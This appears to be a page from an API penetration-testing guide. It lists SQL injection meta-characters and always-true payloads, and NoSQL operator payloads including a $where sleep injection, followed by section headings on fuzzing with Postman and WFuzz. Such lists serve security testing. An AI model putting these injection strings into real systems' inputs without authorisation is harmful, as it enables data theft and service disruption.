Injection Vulnerabilities
SQL Injection Meta-characters
'
''
;%00
--
-- -
""
;
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
OR 1=1NoSQL Injection
$gt
{"$gt":""}
{"$gt":-1}
$ne
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
{"$nin":[1]}
{"$where":"sleep(1000)"}Fuzzing Wide with Postman
Injection Targets
Fuzzing Deep with WFuzz
Troubleshooting WFuzz Attacks
Last updated